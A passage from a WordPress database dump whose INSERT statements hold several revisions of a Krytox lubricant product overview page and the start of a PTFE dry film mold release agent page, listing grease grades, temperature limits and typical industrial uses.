to work best between temperatures of 200–300 °C (400–572 °F). It is nonflammable, oxygen compatible, and chemically inert.</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xht/krytox-xht-grease/krytox-xht-bd/">XHT- BD, BDX, BDZ</a></td>\r\n<td colspan="2">This grease is designed for use where the temperatures are in the 300 °C (572 °F) range and higher where there is a danger of melting the standard PTFE thickener. This grease uses a special non-melting high temperature thickener that also provides extreme pressure properties and works as a solid lubricant if the base oil is depleted. The base oil is an extremely viscous oil that provides good viscosity and lower evaporation at high temperatures. The grease is slightly tacky and will coat the surface and stay in place. The oil in the grease can begin to slowly degrade at temperatures above 330 °C (625 °F), and this will occur at an increasing rate as temperatures increase. Re-lubrication could be required at these temperatures to achieve optimum life. Maximum use temperatures for these greases are 360 °C (680 °F) with intermittent spikes to 400 °C (752 °F).</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><strong>Krytox Lubricants for Specialty Applications</strong></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-gpl-246/">GPL 246</a></td>\r\n<td>GPL 206 with copper added, so it will conduct electricity.</td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-gpl-407/">GPL 407</a></td>\r\n<td colspan="2">A silica thickened non-melting thickener for low speed applications in conveyors and other such applications where temperatures might cause PTFE melting.</td>\r\n</tr>\r\n<tr>\r\n<td>GPL 577</td>\r\n<td colspan="2">A grease containing a special EP additive and anti-corrosion additives for use under high loads where corrosion might be a factor</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-lvp/">LVP</a></td>\r\n<td colspan="2">A special high vacuum grease for applications where outgassing must be avoided. This is used in high vacuum industries and for sealing joints in laboratory applications</td>\r\n</tr>\r\n<tr>\r\n<td>XP 2C5</td>\r\n<td colspan="2">The XP 2C5 grease contains an oil soluble additive that is effective at preventing corrosion and reducing wear. It also contains an extreme pressure additive. Typical applications include those in potentially corrosive atmospheres, where vibration or shock loading may be significant and where an element will spend more time experiencing mixed film or boundary lubrication versus the desired full film or hydrodynamic lubrication.</td>\r\n</tr>\r\n<tr>\r\n<td>XHT EP 298 and EP 299</td>\r\n<td colspan="2">These greases have been formulated for high-temperature applications that need both high load carrying capacity and anti-corrosion protection. Typical applications include conveyor chains that are subjected to moist conditions or frequent temperature cycling that could allow condensation and rusting to occur.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong>\r\nTO BROWSE OUR KRYTOX CATALOG, SELECT A CATEGORY BELOW:</strong>\r\n[product_categories number="12" ids="34,35,156,40,37,38,36,165,39,168,160,143" columns="4" title="Lubricants, Greases and Oils"]\r\n\r\n[follow twitter="https://twitter.com/MSChemicals" facebook="https://www.facebook.com/Miller-Stephenson-Chemical-Co-1158843970871033/" googleplus="https://plus.google.com/105252144916647489581"]\r\n\r\nKrytox™ is  a trademark of The Chemours Company FC, LLC.\r\n\r\n&nbsp;', 'Krytox Application Overview', '', 'inherit', 'closed', 'closed', '', '2050-revision-v1', '', '', '2016-12-22 16:45:14', '2016-12-22 16:45:14', '', 2050, 'https://www.miller-stephenson.com/2050-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (3333, 2, '2016-12-22 16:46:30', '2016-12-22 16:46:30', '<h3>[share title=""]</h3>\r\n<h3>Krytox Application Overview</h3>\r\nDiscovered in 1959, the polymer that would become known worldwide as Krytox showed remarkable thermal and oxidative stability. Potential uses envisioned then included lubricant for the MACH 3+ turbine engine, hydraulic oil, rocket gear box lubricant, and even gyroscope oil.\r\n\r\nIn 1963, Krytox oil was used in a GE engine test for the supersonic transport aircraft. In 1964, new perfluoropolyether (PFPE)-based grease formulations were developed jointly with the U.S. Navy and Air Force, resulting in military specification MIL-G-27617, which was developed specifically for Krytox. The first commercial sales of Krytox were for nonflammable lubricants for the Apollo space program in 1965.\r\n\r\nPrior to 1981, the only commercially available Krytox lubricants were aerospace oil and greases. Since then, PFPE-based oils and greases have been adopted across a very wide range of industries and applications. There are PFPE oils and greases for industrial operations, vacuum pump fluids, incidental food contact, automotive uses, reactive gas, and, of course, military applications—to name just a few.\r\n\r\nToday, of course, it’s our well-known trademark for high performance synthetic lubricants used for a variety of applications. The oils are made from only fluorine, carbon, and oxygen—a mixture of compounds collectively known by many names—including PFPE, perfluoroalkylether (PFAE), and perfluoropolyalkylether (PFPAE). These perfluorinated oils and greases deliver high performance, perform at wide temperature ranges, and provide superior quality lubrication under extreme conditions in comparison to hydrocarbon alternatives. And, with a global distribution network and world-class technical service, it is the lubricant of choice for extreme conditions and performance.\r\n\r\nThe use of Chemours unique PTFE thickener provides superior chemical and thermal stability to all Krytox grease product lines. Many greases are also available with additional anti-wear and anti-corrosion additives to further boost performance in critical operations.\r\n\r\nKrytox performance lubricants provide superior performance and extended life as lubricants, sealants, and dielectrics. With exceptional performance and reliability in the toughest conditions—where productivity matters and downtime costs, it can contribute significantly to lowering the cost of doing business.\r\n<table width="1455">\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" colspan="3" width="1455"><b>Krytox Performance Lubricants</b></td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><strong><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-gpl-series/">General Purpose Applications</a></strong></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-gpl-series/">GPL 10X Oil / 20X Grease</a></td>\r\n<td>The GPL 10X oil/20X grease series contains no additives and can be used on components that come in contact with chemicals.</td>\r\n<td>Typical applications include valves or bearings in contact with chemicals, seal barrier fluids, instruments, and oxygen systems.</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-gpl-series/krytox-gpl-greases/krytox-gpl-extreme-pressure/">GPL 21X</a></td>\r\n<td>The GPL 21X series contains molybdenum disulfide for extreme pressure (EP) conditions and should be used for slow speed or heavily loaded applications where there is no danger of the molybdenum disulfide additive reacting with chemicals or causing contamination.</td>\r\n<td>Typical applications include highly loaded gears, CV joints, U-joints, splined shafts, and commercial electrical switches.</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-gpl-series/krytox-gpl-greases/krytox-anticorrosion/">GPL 22X</a></td>\r\n<td>The GPL 22X series contains sodium nitrite corrosion/ anti-wear inhibitor and is ideal for corrosive environments where there is no danger of the sodium nitrite additive reacting with chemicals or causing contamination problems.</td>\r\n<td>Typical applications are automotive bearings, sealed pump bearings, electric motor bearings, and general purpose bearings.</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;">GPL 29X</td>\r\n<td>The GPL 29X greases have EP and anti-corrosion additives and have been formulated for high temperature applications that need both high load carrying capacity and anti-corrosion protection.</td>\r\n<td>Typical applications include slow-speed conveyor bearings that are subjected to vibration, moist conditions, or frequent temperature cycling that could allow condensation and rusting to occur.</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"> GPL 2EX</td>\r\n<td>The GPL 2E(X) lubricants are formulated using new anti-rust additives. This grease is similar to the GPL 22X series greases, but contains a non-nitrite anticorrosion additive that is the salt of an organic acid. The new additives are effective at low concentration levels, are environmentally friendly, and do not pose any restrictions on long-term recyclability of the grease.</td>\r\n<td>Typical applications are automotive bearings, sealed pump bearings, electric motor bearings, and general purpose bearings.</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/"><strong>Lubricants for Aerospace Applications</strong></a></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/aerospace-aviation-oils/">143</a></td>\r\n<td colspan="2">Krytox 143 series oils are clear, colorless fluorinated synthetic oils that are non-reactive, nonflammable, safe in chemical and oxygen service, and long-lasting.</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/krytox-aerospace-aviation-greases/krytox-240/">240</a></td>\r\n<td colspan="2">Krytox 240 series greases are white, buttery greases with all of the same properties as the 143 series oils that they are made from, but they are in grease form. The 240 AZ, 240 AB, and 240 AC meet MIL-PRF-27617 general specifications. Many of the other 240 series products meet other specifications for individual applications.</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/krytox-aerospace-aviation-greases/krytox-250-series/">250</a></td>\r\n<td colspan="2">Krytox 250 series EP greases are black greases that contain molybdenum disulfide added as an extreme pressure additive for highly loaded gears and bearings.</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/krytox-aerospace-aviation-greases/krytox-283-series/">283</a></td>\r\n<td colspan="2">Krytox 283 series anti-corrosion greases are white greases that contain sodium nitrite. These grades provide rust protection at ambient temperatures, corrosion protection at high temperatures, and anti-wear protection.</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xp-oil/"><strong>Lubricants for Extended Performance Applications</strong></a></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xp-oil/">XP 1A series oils/XP 2A series greases</a></td>\r\n<td colspan="2">The XP lubricant line offers greases and oils with a soluble additive in the oil. It will not be washed away or left behind with the grease thickener. These new patented additives enhance the performance of PFPE greases and oils, giving them improved performance properties. Bearings run quieter and wear less, because there are no solid additives to make noise. Lower wear will extend bearing and component life. The anti-corrosion protection of the additive will reduce rusting and allow longer grease and bearing life. The extreme pressure properties of the additive protect bearings under high loads. These products can be used in any lubrication application.</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-lvp-vpf/"><strong>Lubricating Fluids for Vacuum Pump Applications</strong></a></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-lvp-vpf/">Vacuum Pump Fluids</a></td>\r\n<td colspan="2">The Vacuum pump fluids are used in vacuum pumps and systems, and are used when controlled vapor pressure, nonflammability and non-reactivity are needed. These products can be regenerated back to original properties and reused.</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><strong>L<a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xht/">ubricants for Extra High Temperature Applications</a></strong></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xht/krytox-xht-grease/krytox-xht-s-series/">XHT- S, SX</a></td>\r\n<td colspan="2">This grease is a special high temperature grease with low oil evaporation that provides long bearing life and is compatible with all elastomers and plastics. It has excellent lubrication over a broad temperature range, but is designed to work best between temperatures of 200–300 °C (400–572 °F). It is nonflammable, oxygen compatible, and chemically inert.</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xht/krytox-xht-grease/krytox-xht-ac/">XHT- AC, ACX</a></td>\r\n<td colspan="2">This grease is a special high temperature grease with low oil evaporation that provides long bearing life and is compatible with most elastomers and plastics. This grease contains sodium nitrite corrosion/anti-wear inhibitor and is ideal for corrosive environments where there is no danger of the sodium nitrite additive reacting with chemicals or causing contamination problems. It has excellent lubrication over a broad temperature range, but is designed to work best between temperatures of 200–300 °C (400–572 °F). It is nonflammable, oxygen compatible, and chemically inert.</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xht/krytox-xht-grease/krytox-xht-bd/">XHT- BD, BDX, BDZ</a></td>\r\n<td colspan="2">This grease is designed for use where the temperatures are in the 300 °C (572 °F) range and higher where there is a danger of melting the standard PTFE thickener. This grease uses a special non-melting high temperature thickener that also provides extreme pressure properties and works as a solid lubricant if the base oil is depleted. The base oil is an extremely viscous oil that provides good viscosity and lower evaporation at high temperatures. The grease is slightly tacky and will coat the surface and stay in place. The oil in the grease can begin to slowly degrade at temperatures above 330 °C (625 °F), and this will occur at an increasing rate as temperatures increase. Re-lubrication could be required at these temperatures to achieve optimum life. Maximum use temperatures for these greases are 360 °C (680 °F) with intermittent spikes to 400 °C (752 °F).</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><strong>Krytox Lubricants for Specialty Applications</strong></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-gpl-246/">GPL 246</a></td>\r\n<td>GPL 206 with copper added, so it will conduct electricity.</td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-gpl-407/">GPL 407</a></td>\r\n<td colspan="2">A silica thickened non-melting thickener for low speed applications in conveyors and other such applications where temperatures might cause PTFE melting.</td>\r\n</tr>\r\n<tr>\r\n<td>GPL 577</td>\r\n<td colspan="2">A grease containing a special EP additive and anti-corrosion additives for use under high loads where corrosion might be a factor</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-lvp/">LVP</a></td>\r\n<td colspan="2">A special high vacuum grease for applications where outgassing must be avoided. This is used in high vacuum industries and for sealing joints in laboratory applications</td>\r\n</tr>\r\n<tr>\r\n<td>XP 2C5</td>\r\n<td colspan="2">The XP 2C5 grease contains an oil soluble additive that is effective at preventing corrosion and reducing wear. It also contains an extreme pressure additive. Typical applications include those in potentially corrosive atmospheres, where vibration or shock loading may be significant and where an element will spend more time experiencing mixed film or boundary lubrication versus the desired full film or hydrodynamic lubrication.</td>\r\n</tr>\r\n<tr>\r\n<td>XHT EP 298 and EP 299</td>\r\n<td colspan="2">These greases have been formulated for high-temperature applications that need both high load carrying capacity and anti-corrosion protection. Typical applications include conveyor chains that are subjected to moist conditions or frequent temperature cycling that could allow condensation and rusting to occur.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong>\r\nTO BROWSE OUR KRYTOX CATALOG, SELECT A CATEGORY BELOW:</strong>\r\n[product_categories number="12" ids="34,35,156,40,37,38,36,165,39,168,160,143" columns="4" title="Lubricants, Greases and Oils"]\r\n\r\n[follow twitter="https://twitter.com/MSChemicals" facebook="https://www.facebook.com/Miller-Stephenson-Chemical-Co-1158843970871033/" googleplus="https://plus.google.com/105252144916647489581" linkedin=https://www.linkedin.com/company/miller-stephenson-chemical-company]\r\n\r\nKrytox™ is  a trademark of The Chemours Company FC, LLC.\r\n\r\n&nbsp;', 'Krytox Application Overview', '', 'inherit', 'closed', 'closed', '', '2050-revision-v1', '', '', '2016-12-22 16:46:30', '2016-12-22 16:46:30', '', 2050, 'https://www.miller-stephenson.com/2050-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (3334, 2, '2016-12-22 16:47:03', '2016-12-22 16:47:03', '<h3>[share title=""]</h3>\r\n<h3>Krytox Application Overview</h3>\r\nDiscovered in 1959, the polymer that would become known worldwide as Krytox showed remarkable thermal and oxidative stability. Potential uses envisioned then included lubricant for the MACH 3+ turbine engine, hydraulic oil, rocket gear box lubricant, and even gyroscope oil.\r\n\r\nIn 1963, Krytox oil was used in a GE engine test for the supersonic transport aircraft. In 1964, new perfluoropolyether (PFPE)-based grease formulations were developed jointly with the U.S. Navy and Air Force, resulting in military specification MIL-G-27617, which was developed specifically for Krytox. The first commercial sales of Krytox were for nonflammable lubricants for the Apollo space program in 1965.\r\n\r\nPrior to 1981, the only commercially available Krytox lubricants were aerospace oil and greases. Since then, PFPE-based oils and greases have been adopted across a very wide range of industries and applications. There are PFPE oils and greases for industrial operations, vacuum pump fluids, incidental food contact, automotive uses, reactive gas, and, of course, military applications—to name just a few.\r\n\r\nToday, of course, it’s our well-known trademark for high performance synthetic lubricants used for a variety of applications. The oils are made from only fluorine, carbon, and oxygen—a mixture of compounds collectively known by many names—including PFPE, perfluoroalkylether (PFAE), and perfluoropolyalkylether (PFPAE). These perfluorinated oils and greases deliver high performance, perform at wide temperature ranges, and provide superior quality lubrication under extreme conditions in comparison to hydrocarbon alternatives. And, with a global distribution network and world-class technical service, it is the lubricant of choice for extreme conditions and performance.\r\n\r\nThe use of Chemours unique PTFE thickener provides superior chemical and thermal stability to all Krytox grease product lines. Many greases are also available with additional anti-wear and anti-corrosion additives to further boost performance in critical operations.\r\n\r\nKrytox performance lubricants provide superior performance and extended life as lubricants, sealants, and dielectrics. With exceptional performance and reliability in the toughest conditions—where productivity matters and downtime costs, it can contribute significantly to lowering the cost of doing business.\r\n<table width="1455">\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" colspan="3" width="1455"><b>Krytox Performance Lubricants</b></td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><strong><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-gpl-series/">General Purpose Applications</a></strong></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-gpl-series/">GPL 10X Oil / 20X Grease</a></td>\r\n<td>The GPL 10X oil/20X grease series contains no additives and can be used on components that come in contact with chemicals.</td>\r\n<td>Typical applications include valves or bearings in contact with chemicals, seal barrier fluids, instruments, and oxygen systems.</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-gpl-series/krytox-gpl-greases/krytox-gpl-extreme-pressure/">GPL 21X</a></td>\r\n<td>The GPL 21X series contains molybdenum disulfide for extreme pressure (EP) conditions and should be used for slow speed or heavily loaded applications where there is no danger of the molybdenum disulfide additive reacting with chemicals or causing contamination.</td>\r\n<td>Typical applications include highly loaded gears, CV joints, U-joints, splined shafts, and commercial electrical switches.</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-gpl-series/krytox-gpl-greases/krytox-anticorrosion/">GPL 22X</a></td>\r\n<td>The GPL 22X series contains sodium nitrite corrosion/ anti-wear inhibitor and is ideal for corrosive environments where there is no danger of the sodium nitrite additive reacting with chemicals or causing contamination problems.</td>\r\n<td>Typical applications are automotive bearings, sealed pump bearings, electric motor bearings, and general purpose bearings.</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;">GPL 29X</td>\r\n<td>The GPL 29X greases have EP and anti-corrosion additives and have been formulated for high temperature applications that need both high load carrying capacity and anti-corrosion protection.</td>\r\n<td>Typical applications include slow-speed conveyor bearings that are subjected to vibration, moist conditions, or frequent temperature cycling that could allow condensation and rusting to occur.</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"> GPL 2EX</td>\r\n<td>The GPL 2E(X) lubricants are formulated using new anti-rust additives. This grease is similar to the GPL 22X series greases, but contains a non-nitrite anticorrosion additive that is the salt of an organic acid. The new additives are effective at low concentration levels, are environmentally friendly, and do not pose any restrictions on long-term recyclability of the grease.</td>\r\n<td>Typical applications are automotive bearings, sealed pump bearings, electric motor bearings, and general purpose bearings.</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/"><strong>Lubricants for Aerospace Applications</strong></a></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/aerospace-aviation-oils/">143</a></td>\r\n<td colspan="2">Krytox 143 series oils are clear, colorless fluorinated synthetic oils that are non-reactive, nonflammable, safe in chemical and oxygen service, and long-lasting.</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/krytox-aerospace-aviation-greases/krytox-240/">240</a></td>\r\n<td colspan="2">Krytox 240 series greases are white, buttery greases with all of the same properties as the 143 series oils that they are made from, but they are in grease form. The 240 AZ, 240 AB, and 240 AC meet MIL-PRF-27617 general specifications. Many of the other 240 series products meet other specifications for individual applications.</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/krytox-aerospace-aviation-greases/krytox-250-series/">250</a></td>\r\n<td colspan="2">Krytox 250 series EP greases are black greases that contain molybdenum disulfide added as an extreme pressure additive for highly loaded gears and bearings.</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/krytox-aerospace-aviation-greases/krytox-283-series/">283</a></td>\r\n<td colspan="2">Krytox 283 series anti-corrosion greases are white greases that contain sodium nitrite. These grades provide rust protection at ambient temperatures, corrosion protection at high temperatures, and anti-wear protection.</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xp-oil/"><strong>Lubricants for Extended Performance Applications</strong></a></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xp-oil/">XP 1A series oils/XP 2A series greases</a></td>\r\n<td colspan="2">The XP lubricant line offers greases and oils with a soluble additive in the oil. It will not be washed away or left behind with the grease thickener. These new patented additives enhance the performance of PFPE greases and oils, giving them improved performance properties. Bearings run quieter and wear less, because there are no solid additives to make noise. Lower wear will extend bearing and component life. The anti-corrosion protection of the additive will reduce rusting and allow longer grease and bearing life. The extreme pressure properties of the additive protect bearings under high loads. These products can be used in any lubrication application.</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-lvp-vpf/"><strong>Lubricating Fluids for Vacuum Pump Applications</strong></a></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-lvp-vpf/">Vacuum Pump Fluids</a></td>\r\n<td colspan="2">The Vacuum pump fluids are used in vacuum pumps and systems, and are used when controlled vapor pressure, nonflammability and non-reactivity are needed. These products can be regenerated back to original properties and reused.</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><strong>L<a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xht/">ubricants for Extra High Temperature Applications</a></strong></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xht/krytox-xht-grease/krytox-xht-s-series/">XHT- S, SX</a></td>\r\n<td colspan="2">This grease is a special high temperature grease with low oil evaporation that provides long bearing life and is compatible with all elastomers and plastics. It has excellent lubrication over a broad temperature range, but is designed to work best between temperatures of 200–300 °C (400–572 °F). It is nonflammable, oxygen compatible, and chemically inert.</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xht/krytox-xht-grease/krytox-xht-ac/">XHT- AC, ACX</a></td>\r\n<td colspan="2">This grease is a special high temperature grease with low oil evaporation that provides long bearing life and is compatible with most elastomers and plastics. This grease contains sodium nitrite corrosion/anti-wear inhibitor and is ideal for corrosive environments where there is no danger of the sodium nitrite additive reacting with chemicals or causing contamination problems. It has excellent lubrication over a broad temperature range, but is designed to work best between temperatures of 200–300 °C (400–572 °F). It is nonflammable, oxygen compatible, and chemically inert.</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xht/krytox-xht-grease/krytox-xht-bd/">XHT- BD, BDX, BDZ</a></td>\r\n<td colspan="2">This grease is designed for use where the temperatures are in the 300 °C (572 °F) range and higher where there is a danger of melting the standard PTFE thickener. This grease uses a special non-melting high temperature thickener that also provides extreme pressure properties and works as a solid lubricant if the base oil is depleted. The base oil is an extremely viscous oil that provides good viscosity and lower evaporation at high temperatures. The grease is slightly tacky and will coat the surface and stay in place. The oil in the grease can begin to slowly degrade at temperatures above 330 °C (625 °F), and this will occur at an increasing rate as temperatures increase. Re-lubrication could be required at these temperatures to achieve optimum life. Maximum use temperatures for these greases are 360 °C (680 °F) with intermittent spikes to 400 °C (752 °F).</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><strong>Krytox Lubricants for Specialty Applications</strong></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-gpl-246/">GPL 246</a></td>\r\n<td>GPL 206 with copper added, so it will conduct electricity.</td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-gpl-407/">GPL 407</a></td>\r\n<td colspan="2">A silica thickened non-melting thickener for low speed applications in conveyors and other such applications where temperatures might cause PTFE melting.</td>\r\n</tr>\r\n<tr>\r\n<td>GPL 577</td>\r\n<td colspan="2">A grease containing a special EP additive and anti-corrosion additives for use under high loads where corrosion might be a factor</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-lvp/">LVP</a></td>\r\n<td colspan="2">A special high vacuum grease for applications where outgassing must be avoided. This is used in high vacuum industries and for sealing joints in laboratory applications</td>\r\n</tr>\r\n<tr>\r\n<td>XP 2C5</td>\r\n<td colspan="2">The XP 2C5 grease contains an oil soluble additive that is effective at preventing corrosion and reducing wear. It also contains an extreme pressure additive. Typical applications include those in potentially corrosive atmospheres, where vibration or shock loading may be significant and where an element will spend more time experiencing mixed film or boundary lubrication versus the desired full film or hydrodynamic lubrication.</td>\r\n</tr>\r\n<tr>\r\n<td>XHT EP 298 and EP 299</td>\r\n<td colspan="2">These greases have been formulated for high-temperature applications that need both high load carrying capacity and anti-corrosion protection. Typical applications include conveyor chains that are subjected to moist conditions or frequent temperature cycling that could allow condensation and rusting to occur.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong>\r\nTO BROWSE OUR KRYTOX CATALOG, SELECT A CATEGORY BELOW:</strong>\r\n[product_categories number="12" ids="34,35,156,40,37,38,36,165,39,168,160,143" columns="4" title="Lubricants, Greases and Oils"]\r\n\r\n[follow twitter="https://twitter.com/MSChemicals" facebook="https://www.facebook.com/Miller-Stephenson-Chemical-Co-1158843970871033/" googleplus="https://plus.google.com/105252144916647489581" linkedin="https://www.linkedin.com/company/miller-stephenson-chemical-company"]\r\n\r\nKrytox™ is  a trademark of The Chemours Company FC, LLC.\r\n\r\n&nbsp;', 'Krytox Application Overview', '', 'inherit', 'closed', 'closed', '', '2050-revision-v1', '', '', '2016-12-22 16:47:03', '2016-12-22 16:47:03', '', 2050, 'https://www.miller-stephenson.com/2050-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (3335, 2, '2016-12-22 16:48:43', '2016-12-22 16:48:43', '<h3 style="text-align: center;">[share title=""]</h3>\r\n<h1 style="text-align: center;">PTFE Dry Film Mold Release Agents</h1>\r\n<h1 style="text-align: center;">Optimized surface adhesion; No Post-Molding cleaning</h1>\r\nPTFE (polytetrafluoroethylene) is a robust fluoropolymer which exhibits excellent chemical and thermal stability, high lubricity, low coefficient of friction, and functions as a premier mold release agent. Miller-Stephenson takes the application of PTFE Dry Film Mold Release Agents a step-further and utilizes a proprietary ultra-low molecular weight PTFE polymer to yield unsurpassed adhesion to mold surfaces, maximizing durability while minimizing coefficient of friction and transfer.   These attributes translate to the virtual elimination of mold part distortion - an extremely important criterion in precision molding. Our PTFE dry film release agents are not only ideal for mold release applications but also for dry lubricant operations. Benefits of Miller-Stephenson PTFE Dry Film Release agents:\r\n<ul>\r\n 	<li>Unparalleled release agent durability and surface adhesion</li>\r\n 	<li>No Transfer- Requires minimal post-molding cleaning</li>\r\n 	<li>Ideal for Rubber-to-Metal Bonding; Silicone molding</li>\r\n 	<li>Ideal for Compression / Transfer molding, Resin Casting and Potting;</li>\r\n 	<li>Excels at difficult mold geometries</li>\r\n 	<li>Stable up to 580 F / 304 C</li>\r\n 	<li>Non-migrating; Non-staining</li>\r\n 	<li>100% Non-flammable; Low VOC and GWP</li>\r\n</ul>\r\nIn comparison to typical release agents such as waxes and silicone oil-based release agents, PTFE minimize the need for post molding cleaning, allowing ancillary processes such as painting, adhesives, etc to be done immediately. These post-molding processes are often not directly compatible with the use of a silicone or wax-based release agents. If the release agent contains free silicone, then painting or gluing the component directly after molding will not be possible because silicone residue that remains on the component does not allow paint or adhesives to bond with the component.  Free Silicone-based release agents will cause the surface of parts to seem oily or will "stain" the molded part. Silicone is difficult to remove from various material surfaces once it has become integrated into the mold part, and typically the part will scraped. The risk of operation contamination is also very high and free silicone can shut down a manufacturing paint shop fairly easily, causing production delays and incurring significant expense.Miller-Stephenson has developed a robust portfolio of PTFE Dry Film release agents which circumvent all the drawbacks of silicone oil and wax-based release agents, while also increasing the application efficiency and cost-effectiveness. The use of silicone-free release agents allows for the removal of costly and time consuming cleaning steps and cross-contamination risk in the manufacturing process of many components, thus increasing productivity and lowering operational costs.\r\n\r\n[caption id="attachment_3028" align="alignleft" width="300"]<img class="wp-image-3028" src="https://www.miller-stephenson.com/wp-content/uploads/2016/11/shutterstock_360561536-800x534.jpg" alt="PTFE DryFilm Release Agent" width="300" height="200" /> <strong><a href="https://www.miller-stephenson.com/chemicals/release-agents/ptfe-release-agents/">MS-122SE</a> is ideal for rubber-to-metal operations such as used on cockpit seals</strong>[/caption]\r\n\r\nOur 